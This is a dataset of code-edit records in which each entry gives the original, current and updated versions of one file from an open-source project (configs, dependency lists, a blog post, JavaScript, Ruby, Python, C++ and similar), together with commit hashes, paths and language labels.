今年的 [COSCUP](https://2018.coscup.org/) (2018),Arch Linux 臺灣社群申請社群議程,大會已經審核通過了!即刻起至 5 月 25 日熱烈徵稿,歡迎您來投稿,一起把今年我們的 Arch 社群議程軌辦得豐富又精彩吧!
* [COSCUP 官方公告](http://blog.coscup.org/2018/04/coscup-2... | <|file_sep|>original/_posts/2018-04-26-coscup-2018-community-room-cfp.markdown
<|file_sep|>current/_posts/2018-04-26-coscup-2018-community-room-cfp.markdown
<|file_sep|>updated/_posts/2018-04-26-coscup-2018-community-room-cfp.markdown
---
layout: post
title: "COSCUP 2018 社群議程,Arch Linux Taiwan 熱烈徵稿中!"
date: 2018-0... | 7c264a25a48fe9ef874b38862f7aaeb0b7feaf43 | _posts/2018-04-26-coscup-2018-community-room-cfp.markdown | _posts/2018-04-26-coscup-2018-community-room-cfp.markdown | Markdown |
<|file_sep|>elm-package.json.diff
original:
"elm-lang/core": "2.0.0 <= v < 3.0.0"
updated:
"elm-lang/core": "2.0.0 <= v < 4.0.0"
<|file_sep|>original/elm-package.json
{
"version": "1.0.2",
"summary": "Some friendly functions for learning about tasks",
"repository": "http://github.com/evancz/... | {
"version": "1.0.2",
"summary": "Some friendly functions for learning about tasks",
"repository": "http://github.com/evancz/task-tutorial.git",
"license": "BSD3",
"source-directories": [
"src"
],
"exposed-modules": [
"TaskTutorial"
],
"native-modules": true,
"dep... | <|file_sep|>elm-package.json.diff
original:
"elm-lang/core": "2.0.0 <= v < 3.0.0"
updated:
"elm-lang/core": "2.0.0 <= v < 4.0.0"
<|file_sep|>original/elm-package.json
{
"version": "1.0.2",
"summary": "Some friendly functions for learning about tasks",
"repository": "http://github.com/evancz/... | a3ece47b937a2f9e4c1617bbbe6e7f0273c5a5be | elm-package.json | elm-package.json | JSON |
<|file_sep|>original/README.md
# buckylist
The coolest flask application for your bucket list.
<|file_sep|>current/README.md
# buckylist
The coolest flask application for your bucket list.
<|file_sep|>updated/README.md | # buckylist
[](https://travis-ci.org/JoshuaOndieki/buckylist)
[](https://coveralls.io/github/JoshuaOndieki/buckylist?branch=master)
The c... | <|file_sep|>original/README.md
# buckylist
The coolest flask application for your bucket list.
<|file_sep|>current/README.md
# buckylist
The coolest flask application for your bucket list.
<|file_sep|>updated/README.md
# buckylist
[](https... | 6c182dfe5d7d2de8e1957370c016fe71d8d1edb4 | README.md | README.md | Markdown |
<|file_sep|>assets/js/steam.js.diff
original:
var sups = document.getElementsByTagName('sup');
var footnotes = document.getElementsByClassName('footnote');
updated:
var sups = document.getElementsByClassName('footnote-ref');
var footnotes = document.getElementsByClassName('footnote-backref');
<|file_sep... | // Smooth Scroll
smoothScroll.init({
speed: 800,
easing: 'easeInOutCubic',
updateURL: false,
offset: 125
});
// Inject data-scroll attr into footnotes
function footnotesSmoothScroll() {
var sups = document.getElementsByClassName('footnote-ref');
var footnotes = document.getElementsByClassName('... | <|file_sep|>assets/js/steam.js.diff
original:
var sups = document.getElementsByTagName('sup');
var footnotes = document.getElementsByClassName('footnote');
updated:
var sups = document.getElementsByClassName('footnote-ref');
var footnotes = document.getElementsByClassName('footnote-backref');
<|file_sep... | 3ed9b3e428c84d100f4a405b1af4506d6ac387c7 | assets/js/steam.js | assets/js/steam.js | JavaScript |
<|file_sep|>original/requirements_dev.txt
pip==9.0.1
bumpversion==0.5.3
wheel==0.29.0
watchdog==0.8.3
flake8==3.4.1
tox==2.7.0
coverage==4.4.1
Sphinx==1.6.3
cryptography==2.0.2
PyYAML==3.12
pytest==3.1.3
pytz==2017.2
<|file_sep|>current/requirements_dev.txt
pip==9.0.1
bumpversion==0.5.3
wheel==0.29.0
watchdog==0.8.3
fl... | pip==9.0.1
bumpversion==0.5.3
wheel==0.29.0
watchdog==0.8.3
flake8==3.4.1
tox==2.7.0
coverage==4.4.1
Sphinx==1.6.3
cryptography==2.0.2
PyYAML==3.12
pytest==3.2.0
pytz==2017.2 | <|file_sep|>original/requirements_dev.txt
pip==9.0.1
bumpversion==0.5.3
wheel==0.29.0
watchdog==0.8.3
flake8==3.4.1
tox==2.7.0
coverage==4.4.1
Sphinx==1.6.3
cryptography==2.0.2
PyYAML==3.12
pytest==3.1.3
pytz==2017.2
<|file_sep|>current/requirements_dev.txt
pip==9.0.1
bumpversion==0.5.3
wheel==0.29.0
watchdog==0.8.3
fl... | 0a86afa28c2ca9f8637e351b7a1207da8a89cb99 | requirements_dev.txt | requirements_dev.txt | Text |
<|file_sep|>original/LayoutTests/fast/repaint/resources/text-based-repaint.js
}
function finishRepaintTest()
{
// Force a style recalc.
var dummy = document.body.offsetTop;
var repaintRects = window.internals.repaintRectsAsText(document);
internals.stopTrackingRepaints(document);
var pre = docum... |
function finishRepaintTest()
{
// Force a style recalc.
var dummy = document.body.offsetTop;
var repaintRects = window.internals.repaintRectsAsText(document);
internals.stopTrackingRepaints(document);
var pre = document.createElement('pre');
pre.style.opacity = 0; // appear in text dumps, b... | <|file_sep|>original/LayoutTests/fast/repaint/resources/text-based-repaint.js
}
function finishRepaintTest()
{
// Force a style recalc.
var dummy = document.body.offsetTop;
var repaintRects = window.internals.repaintRectsAsText(document);
internals.stopTrackingRepaints(document);
var pre = docum... | 3aba835cb44a5fcde383da493dca5a1ea8f08788 | LayoutTests/fast/repaint/resources/text-based-repaint.js | LayoutTests/fast/repaint/resources/text-based-repaint.js | JavaScript |
<|file_sep|>original/spec/features/topics_spec.rb
FactoryGirl.create(:ip_cache, ip_address: '1.2.3.4')
end
let(:user) do
FactoryGirl.create(:activated_user, email: 'activated_user@example.com')
end
it 'lets a valid user post a valid topic without logging in' do
visit '/'
click_link 'New Topic'... | make_new_topic(title: 'Inspiring topic title',
post: 'Bold and motivational message body')
expect(current_path).to eq '/topics/1'
expect(page).to have_content 'Inspiring topic title'
expect(page).to have_content 'Bold and motivational message body'
visit '/'
expect(page).to h... | <|file_sep|>original/spec/features/topics_spec.rb
FactoryGirl.create(:ip_cache, ip_address: '1.2.3.4')
end
let(:user) do
FactoryGirl.create(:activated_user, email: 'activated_user@example.com')
end
it 'lets a valid user post a valid topic without logging in' do
visit '/'
click_link 'New Topic'... | 532c9254f8c0349c932442d0bfe4a2acb0805de7 | spec/features/topics_spec.rb | spec/features/topics_spec.rb | Ruby |
<|file_sep|>SimpleWriteAndRead/src/SimpleWriteAndRead/ReaderFlowlet.java.diff
original:
TupleSchema out = new TupleSchemaBuilder().
add("row", byte[].class).
add("column", byte[].class).
add("value", byte[].class).
create();
configurator.getDefaultTupleOutputStream().setSchema(o... |
@Override
public void process(Tuple tuple, TupleContext tupleContext, OutputCollector outputCollector) {
if (Common.debug)
System.out.println(this.getClass().getSimpleName() + ": Received tuple " + tuple);
// perform inline read of row+column
byte [] row = tuple.get("row");
byte [] column = ... | <|file_sep|>SimpleWriteAndRead/src/SimpleWriteAndRead/ReaderFlowlet.java.diff
original:
TupleSchema out = new TupleSchemaBuilder().
add("row", byte[].class).
add("column", byte[].class).
add("value", byte[].class).
create();
configurator.getDefaultTupleOutputStream().setSchema(o... | 435fdefcadc1c93cd7f9641711df807cf939e229 | SimpleWriteAndRead/src/SimpleWriteAndRead/ReaderFlowlet.java | SimpleWriteAndRead/src/SimpleWriteAndRead/ReaderFlowlet.java | Java |
<|file_sep|>original/lib/tasks/setup_exchange.rake
<|file_sep|>current/lib/tasks/setup_exchange.rake
<|file_sep|>updated/lib/tasks/setup_exchange.rake | task :setup_exchange do
config = YAML.load_file(Rails.root.join("config", "rabbitmq.yml"))[Rails.env].symbolize_keys
bunny = Bunny.new(ENV["RABBITMQ_URL"])
channel = bunny.start.create_channel
Bunny::Exchange.new(channel, :topic, config[:exchange])
end | <|file_sep|>original/lib/tasks/setup_exchange.rake
<|file_sep|>current/lib/tasks/setup_exchange.rake
<|file_sep|>updated/lib/tasks/setup_exchange.rake
task :setup_exchange do
config = YAML.load_file(Rails.root.join("config", "rabbitmq.yml"))[Rails.env].symbolize_keys
bunny = Bunny.new(ENV["RABBITMQ_URL"])
chan... | cd75de7f435d4d5f0347251f3bc5cdbc8ecd51fb | lib/tasks/setup_exchange.rake | lib/tasks/setup_exchange.rake | Ruby |
<|file_sep|>original/integration/zap/docker-compose.yml
version: "2"
services:
zap:
command: [ zap.sh, -daemon, -host, "0.0.0.0", -port, "8080", -config, api.disablekey=true, -config, api.addrs.addr.name=.*, -config, api.addrs.addr.regex=true ]
env_file: ##WORKING_DIR##/config.env
image: owasp/zap2docker-... | version: "2"
services:
zap:
command: [ zap.sh, -daemon, -host, "0.0.0.0", -port, "8080", -config, api.disablekey=true, -config, api.addrs.addr.name=.*, -config, api.addrs.addr.regex=true ]
env_file: ##WORKING_DIR##/config.env
image: owasp/zap2docker-bare
ports:
- 8080 | <|file_sep|>original/integration/zap/docker-compose.yml
version: "2"
services:
zap:
command: [ zap.sh, -daemon, -host, "0.0.0.0", -port, "8080", -config, api.disablekey=true, -config, api.addrs.addr.name=.*, -config, api.addrs.addr.regex=true ]
env_file: ##WORKING_DIR##/config.env
image: owasp/zap2docker-... | 689bd2bc1af314b43eb85056d4a613ac194f09ad | integration/zap/docker-compose.yml | integration/zap/docker-compose.yml | YAML |
<|file_sep|>original/fuzz/oss_fuzz/FuzzRegionDeserialize.cpp
return false;
}
region.computeRegionComplexity();
region.isComplex();
SkRegion r2;
if (region == r2) {
region.contains(0,0);
} else {
region.contains(1,1);
}
auto s = SkSurface::MakeRasterN32Premul(1024,... | return false;
}
region.computeRegionComplexity();
region.isComplex();
SkRegion r2;
if (region == r2) {
region.contains(0,0);
} else {
region.contains(1,1);
}
auto s = SkSurface::MakeRasterN32Premul(128, 128);
if (!s) {
// May return nullptr in memory-c... | <|file_sep|>original/fuzz/oss_fuzz/FuzzRegionDeserialize.cpp
return false;
}
region.computeRegionComplexity();
region.isComplex();
SkRegion r2;
if (region == r2) {
region.contains(0,0);
} else {
region.contains(1,1);
}
auto s = SkSurface::MakeRasterN32Premul(1024,... | a71b8d17e8b0cc1ee19a75d75c1f52dc8030f68d | fuzz/oss_fuzz/FuzzRegionDeserialize.cpp | fuzz/oss_fuzz/FuzzRegionDeserialize.cpp | C++ |
<|file_sep|>packages/pe/periodic-client.yaml.diff
original:
hash: 9a03b05ba1016a90f16a7371fd8e25ecc483f2413c273e7d38a26455880f364d
updated:
hash: 2fbeaf72801f8018424549d9d583df7dcb6d50e3f6fedc19e751c9985148d456
<|file_sep|>packages/pe/periodic-client.yaml.diff
original:
updated:
- 1.1.7.2
<|file_sep|>original/packages... | base: '>=4.7 && <5'
resource-pool: -any
metro-socket: -any
binary: -any
periodic-common: -any
hslogger: -any
mtl: -any
byteable: -any
transformers: -any
metro: -any
all-versions:
- 1.1.7.1
- 1.1.7.2
author: Li Meng Jun
latest: 1.1.7.2
description-type: markdown
description: |
# periodic-client
... | <|file_sep|>packages/pe/periodic-client.yaml.diff
original:
hash: 9a03b05ba1016a90f16a7371fd8e25ecc483f2413c273e7d38a26455880f364d
updated:
hash: 2fbeaf72801f8018424549d9d583df7dcb6d50e3f6fedc19e751c9985148d456
<|file_sep|>packages/pe/periodic-client.yaml.diff
original:
updated:
- 1.1.7.2
<|file_sep|>original/packages... | f5aa3681d3ebc5a14fcf7a17f586efd282a3fbfb | packages/pe/periodic-client.yaml | packages/pe/periodic-client.yaml | YAML |
<|file_sep|>original/packages/an/annotated-exception.yaml
<|file_sep|>current/packages/an/annotated-exception.yaml
<|file_sep|>updated/packages/an/annotated-exception.yaml | homepage: https://github.com/parsonsmatt/annotated-exception#readme
changelog-type: markdown
hash: 20226fc85b6949651ae875969ac88a982a7574c1bc675d3e6d4aa23c5e2b4174
test-bench-deps:
base: '>=4.7 && <5'
hspec: -any
text: -any
safe-exceptions: -any
containers: -any
annotated-exception: -any
maintainer: parsons... | <|file_sep|>original/packages/an/annotated-exception.yaml
<|file_sep|>current/packages/an/annotated-exception.yaml
<|file_sep|>updated/packages/an/annotated-exception.yaml
homepage: https://github.com/parsonsmatt/annotated-exception#readme
changelog-type: markdown
hash: 20226fc85b6949651ae875969ac88a982a7574c1bc675d3... | b707bddaf287f5b8cfb641099c6c17c15a7d5ede | packages/an/annotated-exception.yaml | packages/an/annotated-exception.yaml | YAML |
<|file_sep|>original/Cargo.toml
readme = "./README.md"
# This is a small list of keywords used to categorize and search for this
# package.
keywords = ["bloomfilter", "cuckoohashing", "cuckoofilter"]
# This is a string description of the license for this package. Currently
# crates.io will validate the license provid... | readme = "./README.md"
# This is a small list of keywords used to categorize and search for this
# package.
keywords = ["bloomfilter", "cuckoohashing", "cuckoofilter"]
# This is a string description of the license for this package. Currently
# crates.io will validate the license provided against a whitelist of known
... | <|file_sep|>original/Cargo.toml
readme = "./README.md"
# This is a small list of keywords used to categorize and search for this
# package.
keywords = ["bloomfilter", "cuckoohashing", "cuckoofilter"]
# This is a string description of the license for this package. Currently
# crates.io will validate the license provid... | ad52ea3a3d5286c31b1db134e7e33e1bf4ad43fb | Cargo.toml | Cargo.toml | TOML |
<|file_sep|>original/takarabako.gemspec
require 'takarabako/version'
Gem::Specification.new do |spec|
spec.name = "takarabako"
spec.version = Takarabako::VERSION
spec.authors = ["willnet"]
spec.email = ["netwillnet@gmail.com"]
spec.description = %q{random Japanese name of game ... | $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'takarabako/version'
Gem::Specification.new do |spec|
spec.name = "takarabako"
spec.version = Takarabako::VERSION
spec.authors = ["willnet"]
spec.email = ["netwillnet@gmail.com"]
spec.description = %q{random Japane... | <|file_sep|>original/takarabako.gemspec
require 'takarabako/version'
Gem::Specification.new do |spec|
spec.name = "takarabako"
spec.version = Takarabako::VERSION
spec.authors = ["willnet"]
spec.email = ["netwillnet@gmail.com"]
spec.description = %q{random Japanese name of game ... | 64a29ac436de520f76d195bc9551a2a97e7de323 | takarabako.gemspec | takarabako.gemspec | Ruby |
<|file_sep|>original/tsconfig.json
{
"compilerOptions": {
"module": "esnext",
"moduleResolution": "node",
"allowSyntheticDefaultImports": true,
"noImplicitAny": true,
"noImplicitThis": true,
"strictNullChecks": true,
"sourceMap": true,
"target": "es2015",
"jsx": "react",
"lib":... | "moduleResolution": "node",
"allowSyntheticDefaultImports": true,
"noImplicitAny": true,
"noImplicitThis": true,
"strictNullChecks": true,
"sourceMap": true,
"target": "es2015",
"jsx": "react",
"lib": ["DOM", "es2015", "es2016", "es2017", "DOM.Iterable"],
"typeRoots": [
"no... | <|file_sep|>original/tsconfig.json
{
"compilerOptions": {
"module": "esnext",
"moduleResolution": "node",
"allowSyntheticDefaultImports": true,
"noImplicitAny": true,
"noImplicitThis": true,
"strictNullChecks": true,
"sourceMap": true,
"target": "es2015",
"jsx": "react",
"lib":... | 5823fe5032cf4dde4ec3478039375d865a79bb37 | tsconfig.json | tsconfig.json | JSON |
<|file_sep|>src/components/SightingList.jsx.diff
original:
updated:
// import { Card, CardMedia, CardTitle, CardText } from 'material-ui/Card';
// import styled from 'styled-components';
// const Img = styled.img`
// margin:
// `
<|file_sep|>original/src/components/SightingList.jsx
{s.count}
</... | Sex:
{s.sex}
</li>
<li>
Lat:
{s.lat}
</li>
<li>
Long:
{s.lon}
</li>
<li>
<img src={s.photoURL} alt={s.scientificName} width="300px" />
</li>
</ul>
))}
... | <|file_sep|>src/components/SightingList.jsx.diff
original:
updated:
// import { Card, CardMedia, CardTitle, CardText } from 'material-ui/Card';
// import styled from 'styled-components';
// const Img = styled.img`
// margin:
// `
<|file_sep|>original/src/components/SightingList.jsx
{s.count}
</... | d51d2be60cc163c8b4f8989c046e20786aa3b1f0 | src/components/SightingList.jsx | src/components/SightingList.jsx | JSX |
<|file_sep|>original/backend/scripts/tiffconvert.py
<|file_sep|>current/backend/scripts/tiffconvert.py
<|file_sep|>updated/backend/scripts/tiffconvert.py | #!/usr/bin/env python
from PIL import Image
import rethinkdb as r
from optparse import OptionParser
import sys
import os
import errno
def datafile_dir(mcdir, datafile_id):
pieces = datafile_id.split("-")
return os.path.join(mcdir, pieces[1][0:2], pieces[1][2:4])
def mkdirp(path):
try:
os.makedir... | <|file_sep|>original/backend/scripts/tiffconvert.py
<|file_sep|>current/backend/scripts/tiffconvert.py
<|file_sep|>updated/backend/scripts/tiffconvert.py
#!/usr/bin/env python
from PIL import Image
import rethinkdb as r
from optparse import OptionParser
import sys
import os
import errno
def datafile_dir(mcdir, data... | 7c249b245406198aa1c2bc38012f2ae404b757aa | backend/scripts/tiffconvert.py | backend/scripts/tiffconvert.py | Python |
<|file_sep|>original/.travis.yml
php:
- 5.4
- 5.5
- 5.6
- 7.0
- hhvm
matrix:
fast_finish: true
allow_failures:
- php: hhvm
- php: 5.4
install:
- composer install
script:
- ./vendor/bin/phpunit
- ./vendor/bin/phpcs -n -p --extensions=php --standard=vendor/cakephp/cakephp-codesniffer/CakeP... |
php:
- 5.4
- 5.5
- 5.6
- 7.0
- hhvm
matrix:
fast_finish: true
allow_failures:
- php: hhvm
- php: 5.4
install:
- composer install
script:
- ./vendor/bin/phpunit
- ./vendor/bin/phpcs -n -p --extensions=php --standard=vendor/cakephp/cakephp-codesniffer/CakePHP src/ tests/Fixture/ tests/Test... | <|file_sep|>original/.travis.yml
php:
- 5.4
- 5.5
- 5.6
- 7.0
- hhvm
matrix:
fast_finish: true
allow_failures:
- php: hhvm
- php: 5.4
install:
- composer install
script:
- ./vendor/bin/phpunit
- ./vendor/bin/phpcs -n -p --extensions=php --standard=vendor/cakephp/cakephp-codesniffer/CakeP... | ebb0014b4f5ea64191eeff0022196ac5bc723d46 | .travis.yml | .travis.yml | YAML |
<|file_sep|>original/dev-requirements.txt
attrs==18.1.0
bandit==1.5.1
check-manifest==0.37
coveralls==1.5.0
codecov==2.0.15
flake8-bugbear==18.8.0;python_version>="3.5"
flake8-docstrings==1.3.0
flake8-import-order==0.18
pycodestyle==2.3.1
flake8==3.5.0
hypothesis==3.82.1
mccabe==0.6.1
mypy==0.600
pytest==3.8.1
pep8-nam... | attrs==18.1.0
bandit==1.5.1
check-manifest==0.37
coveralls==1.5.0
codecov==2.0.15
flake8-bugbear==18.8.0;python_version>="3.5"
flake8-docstrings==1.3.0
flake8-import-order==0.18
pycodestyle==2.3.1
flake8==3.5.0
hypothesis==4.4.2
mccabe==0.6.1
mypy==0.600
pytest==3.8.1
pep8-naming==0.7.0
pipdeptree==0.13.0
pipenv==2018.... | <|file_sep|>original/dev-requirements.txt
attrs==18.1.0
bandit==1.5.1
check-manifest==0.37
coveralls==1.5.0
codecov==2.0.15
flake8-bugbear==18.8.0;python_version>="3.5"
flake8-docstrings==1.3.0
flake8-import-order==0.18
pycodestyle==2.3.1
flake8==3.5.0
hypothesis==3.82.1
mccabe==0.6.1
mypy==0.600
pytest==3.8.1
pep8-nam... | d15ccff4b6d046678f1f7aaaed62e00c9f57d79e | dev-requirements.txt | dev-requirements.txt | Text |
<|file_sep|>tests/OmniSharp.MSBuild.Tests/ProjectFileInfoTests.cs.diff
original:
public void Hello_world_has_correct_property_values()
updated:
public void HelloWorld_has_correct_property_values()
<|file_sep|>original/tests/OmniSharp.MSBuild.Tests/ProjectFileInfoTests.cs
this._testAssets = T... | var projectFolder = _testAssets.GetTestProjectFolder("HelloWorld");
var projectFilePath = Path.Combine(projectFolder, "HelloWorld.csproj");
var projectFileInfo = ProjectFileInfo.Create(projectFilePath, projectFolder, this._logger);
Assert.NotNull(projectFileInfo);
... | <|file_sep|>tests/OmniSharp.MSBuild.Tests/ProjectFileInfoTests.cs.diff
original:
public void Hello_world_has_correct_property_values()
updated:
public void HelloWorld_has_correct_property_values()
<|file_sep|>original/tests/OmniSharp.MSBuild.Tests/ProjectFileInfoTests.cs
this._testAssets = T... | 9a736daec74f96fecd168044cc370833cb985e80 | tests/OmniSharp.MSBuild.Tests/ProjectFileInfoTests.cs | tests/OmniSharp.MSBuild.Tests/ProjectFileInfoTests.cs | C# |
<|file_sep|>original/.travis.yml
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# ... | #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
s... | <|file_sep|>original/.travis.yml
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# ... | 02639d48cb3a1f3355ad1624d423f9f69b7b4f10 | .travis.yml | .travis.yml | YAML |
<|file_sep|>original/catalog/Web_Apps_Services_Interaction/Web_Analytics.yml
name: Web Analytics
description:
projects:
- ga_events
- gabba
- gabbara
- garb
- gattica
- google-analytics-rails
- googlepagerank
- legato
- mixpanel_rails
- PageRankr
- rack-google-analytics
- rack_clicky
- redis_... | name: Web Analytics
description:
projects:
- callcounter
- ga_events
- gabba
- gabbara
- garb
- gattica
- google-analytics-rails
- googlepagerank
- legato
- mixpanel_rails
- PageRankr
- rack-google-analytics
- rack_clicky
- redis_analytics
- rugalytics
- wwwtf
- yaga | <|file_sep|>original/catalog/Web_Apps_Services_Interaction/Web_Analytics.yml
name: Web Analytics
description:
projects:
- ga_events
- gabba
- gabbara
- garb
- gattica
- google-analytics-rails
- googlepagerank
- legato
- mixpanel_rails
- PageRankr
- rack-google-analytics
- rack_clicky
- redis_... | 902d76e72a81e84424f025fd7c93fe1cbdb168a3 | catalog/Web_Apps_Services_Interaction/Web_Analytics.yml | catalog/Web_Apps_Services_Interaction/Web_Analytics.yml | YAML |
<|file_sep|>Cargo.toml.diff
original:
version = "0.2.3"
updated:
version = "0.2.4"
<|file_sep|>original/Cargo.toml
[package]
name = "blurz"
version = "0.2.3"
description = "Bluetooth lib for Rust using blueZ/dbus"
readme = "README.md"
authors = ["Attila Dusnoki <adusnoki@inf.u-szeged.hu>"]
repository = "https://github.... | [package]
name = "blurz"
version = "0.2.4"
description = "Bluetooth lib for Rust using blueZ/dbus"
readme = "README.md"
authors = ["Attila Dusnoki <adusnoki@inf.u-szeged.hu>"]
repository = "https://github.com/szeged/blurz"
keywords = ["bluetooth", "bluez", "ble"]
license = "BSD-2-Clause"
[lib]
name = "blurz"
path = "s... | <|file_sep|>Cargo.toml.diff
original:
version = "0.2.3"
updated:
version = "0.2.4"
<|file_sep|>original/Cargo.toml
[package]
name = "blurz"
version = "0.2.3"
description = "Bluetooth lib for Rust using blueZ/dbus"
readme = "README.md"
authors = ["Attila Dusnoki <adusnoki@inf.u-szeged.hu>"]
repository = "https://github.... | 7729c462439fb692f12e385a84ab371423eb4cd6 | Cargo.toml | Cargo.toml | TOML |
<|file_sep|>original/src/leiningen/new/cryogen/project.clj
(defproject cryogen "0.1.0"
:description "Simple static site generator"
:url "https://github.com/lacarmen/cryogen"
:license {:name "Eclipse Public License"
:url "http://www.eclipse.org/legal/epl-v10.html... | (defproject cryogen "0.1.0"
:description "Simple static site generator"
:url "https://github.com/lacarmen/cryogen"
:license {:name "Eclipse Public License"
:url "http://www.eclipse.org/legal/epl-v10.html"}
:dependencies [[org.clojure/clojure "1.6.0"]... | <|file_sep|>original/src/leiningen/new/cryogen/project.clj
(defproject cryogen "0.1.0"
:description "Simple static site generator"
:url "https://github.com/lacarmen/cryogen"
:license {:name "Eclipse Public License"
:url "http://www.eclipse.org/legal/epl-v10.html... | 0bc4e0cdc6e39d09a15f22c78e226d6c12d4acae | src/leiningen/new/cryogen/project.clj | src/leiningen/new/cryogen/project.clj | Clojure |
<|file_sep|>ruby/ext/bson/native.c.diff
original:
const int32_t v = NUM2INT(self);
const char bytes[4] = { v & 255, (v >> 8) & 255, (v >> 16) & 255, (v >> 24) & 255 };
return rb_str_new(bytes, 4);
updated:
/* const int32_t v = NUM2INT(self); */
/* const char bytes[4] = { v & 255, (v >> 8) & 255, (v >> 16) & 2... | #include <ruby.h>
#include <stdint.h>
static VALUE rb_integer_to_bson(VALUE self)
{
/* const int32_t v = NUM2INT(self); */
/* const char bytes[4] = { v & 255, (v >> 8) & 255, (v >> 16) & 255, (v >> 24) & 255 }; */
/* return rb_str_new(bytes, 4); */
}
void Init_native()
{
/* VALUE bson = rb_const_get(rb_cObjec... | <|file_sep|>ruby/ext/bson/native.c.diff
original:
const int32_t v = NUM2INT(self);
const char bytes[4] = { v & 255, (v >> 8) & 255, (v >> 16) & 255, (v >> 24) & 255 };
return rb_str_new(bytes, 4);
updated:
/* const int32_t v = NUM2INT(self); */
/* const char bytes[4] = { v & 255, (v >> 8) & 255, (v >> 16) & 2... | ce1c5ee0155b47403c63232a5e073929e6243897 | ruby/ext/bson/native.c | ruby/ext/bson/native.c | C |
<|file_sep|>original/CHANGELOG.md
# Change Log
All notable changes to this project will be documented in this file.
## Upcoming
### Removed
- Duplicate call for commit changelog
## v2.0.3 - 2015-03-02
### Changed
- Log errors
## v2.0.2 - 2015-03-02
### Added
- Logging
## v2.0.1 - 2015-03-02
### Changed
- Fix tests
... | # Change Log
All notable changes to this project will be documented in this file.
## v2.0.4 - 2015-03-02
### Removed
- Duplicate call for commit changelog
## v2.0.3 - 2015-03-02
### Changed
- Log errors
## v2.0.2 - 2015-03-02
### Added
- Logging
## v2.0.1 - 2015-03-02
### Changed
- Fix tests
## v2.0.0 - 2015-03-02... | <|file_sep|>original/CHANGELOG.md
# Change Log
All notable changes to this project will be documented in this file.
## Upcoming
### Removed
- Duplicate call for commit changelog
## v2.0.3 - 2015-03-02
### Changed
- Log errors
## v2.0.2 - 2015-03-02
### Added
- Logging
## v2.0.1 - 2015-03-02
### Changed
- Fix tests
... | adcb45cde4852d4e8d4f5df53fce5866c6f078fd | CHANGELOG.md | CHANGELOG.md | Markdown |
<|file_sep|>original/doc/release-notes-14282.md
<|file_sep|>current/doc/release-notes-14282.md
<|file_sep|>updated/doc/release-notes-14282.md | Low-level RPC changes
----------------------
`-usehd` was removed in version 0.16. From that version onwards, all new
wallets created are hierarchical deterministic wallets. Version 0.18 makes
specifying `-usehd` invalid config. | <|file_sep|>original/doc/release-notes-14282.md
<|file_sep|>current/doc/release-notes-14282.md
<|file_sep|>updated/doc/release-notes-14282.md
Low-level RPC changes
----------------------
`-usehd` was removed in version 0.16. From that version onwards, all new
wallets created are hierarchical deterministic wallets. V... | f42660bf54f3cb284fa777c8e5703b3dc5ace6f5 | doc/release-notes-14282.md | doc/release-notes-14282.md | Markdown |
<|file_sep|>original/core/lib/spree/testing_support/factories/payment_factory.rb
FactoryGirl.define do
factory :payment, class: Spree::Payment do
amount 45.75
association(:payment_method, factory: :credit_card_payment_method)
association(:source, factory: :credit_card)
order
state 'checkout'
r... | FactoryGirl.define do
factory :payment, aliases: [:credit_card_payment], class: Spree::Payment do
amount 45.75
association(:payment_method, factory: :credit_card_payment_method)
association(:source, factory: :credit_card)
order
state 'checkout'
response_code '12345'
factory :payment_with_... | <|file_sep|>original/core/lib/spree/testing_support/factories/payment_factory.rb
FactoryGirl.define do
factory :payment, class: Spree::Payment do
amount 45.75
association(:payment_method, factory: :credit_card_payment_method)
association(:source, factory: :credit_card)
order
state 'checkout'
r... | 765eb0e84170d08c5ff8fd047a90f85eef6ed1fd | core/lib/spree/testing_support/factories/payment_factory.rb | core/lib/spree/testing_support/factories/payment_factory.rb | Ruby |
<|file_sep|>original/requirements_dev.txt
# deploy stuff
pip==9.0.1
bumpversion==0.5.3
wheel==0.30.0
cryptography==2.0.3
PyYAML==3.12
<|file_sep|>current/requirements_dev.txt
# deploy stuff
pip==9.0.1
bumpversion==0.5.3
wheel==0.30.0
cryptography==2.0.3
PyYAML==3.12
<|file_sep|>updated/requirements_dev.txt | # deploy stuff
pip==9.0.1
bumpversion==0.5.3
wheel==0.30.0
cryptography==2.1.1
PyYAML==3.12 | <|file_sep|>original/requirements_dev.txt
# deploy stuff
pip==9.0.1
bumpversion==0.5.3
wheel==0.30.0
cryptography==2.0.3
PyYAML==3.12
<|file_sep|>current/requirements_dev.txt
# deploy stuff
pip==9.0.1
bumpversion==0.5.3
wheel==0.30.0
cryptography==2.0.3
PyYAML==3.12
<|file_sep|>updated/requirements_dev.txt
# deploy stu... | 7faf60ee781fb5e42d8594897222d3ec4f7eb7d2 | requirements_dev.txt | requirements_dev.txt | Text |
<|file_sep|>original/.travis.yml
language: perl
matrix:
include:
- perl: "5.20"
- perl: "5.18"
- perl: "5.16"
- perl: "5.14"
- perl: "5.12"
- perl: "5.10"
- perl: "5.8"
before_install:
- sudo apt-get update -qq
- sudo apt-get install -y graphviz
<|file_sep|>current/.travis.yml
lang... | language: perl
matrix:
include:
- perl: "5.20"
- perl: "5.18"
- perl: "5.16"
- perl: "5.14"
- perl: "5.12"
- perl: "5.10"
before_install:
- sudo apt-get update -qq
- sudo apt-get install -y graphviz | <|file_sep|>original/.travis.yml
language: perl
matrix:
include:
- perl: "5.20"
- perl: "5.18"
- perl: "5.16"
- perl: "5.14"
- perl: "5.12"
- perl: "5.10"
- perl: "5.8"
before_install:
- sudo apt-get update -qq
- sudo apt-get install -y graphviz
<|file_sep|>current/.travis.yml
lang... | 245c5b10178bf29bee15ab92ae25baa9ab176d0a | .travis.yml | .travis.yml | YAML |
<|file_sep|>original/app/assets/stylesheets/error-message.css.sass
.error-message
white-space: pre
max-width: 700px
overflow-x: auto
<|file_sep|>current/app/assets/stylesheets/error-message.css.sass
.error-message
white-space: pre
max-width: 700px
overflow-x: auto
<|file_sep|>updated/app/assets/stylesheets/... | .error-message
white-space: pre
max-width: 700px
max-height: 75vh
overflow-x: auto | <|file_sep|>original/app/assets/stylesheets/error-message.css.sass
